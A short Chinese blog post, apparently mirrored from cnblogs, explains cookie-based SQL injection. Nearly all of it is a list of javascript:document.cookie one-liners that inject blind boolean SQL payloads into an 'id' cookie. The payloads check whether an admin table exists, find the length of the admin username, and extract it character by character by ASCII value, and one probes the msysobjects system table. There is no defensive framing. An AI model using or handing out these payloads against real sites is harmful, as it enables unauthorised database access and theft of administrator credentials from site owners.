zoukankan      html  css  js  c++  java
  • cookies注入

    前提是服务器读取cookies验证(有加密和数字签名的cookies很难修改了)

    一。通过盗取 和修改cookies文件

    二。通过命令行document.cookie

    javascript:alert(document.cookie="id="+escape("156 and 1=1"));
    javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
    //猜是否有admin表
    javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
    //猜是否有username表
    javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
    //看管理员密码是否是5位
    javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
    //第一位是否是ASC码97,相当于a
    javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
    javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
    //第二位
    javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
    //看系统表

  • 相关阅读:
    如何配置寄存器
    逻辑分析仪的使用
    CAN中如何计算波特率并配置波特率
    led不同颜色的驱动电压和驱动电流
    ULINK2配置
    电机加减速转动
    2N7002
    未添加时钟文件产生报错
    烟雾传感器
    Strategy 设计模式 策略模式 超靠谱原代码讲解
  • 原文地址:https://www.cnblogs.com/cuihongyu3503319/p/1486693.html
Copyright © 2011-2022 走看看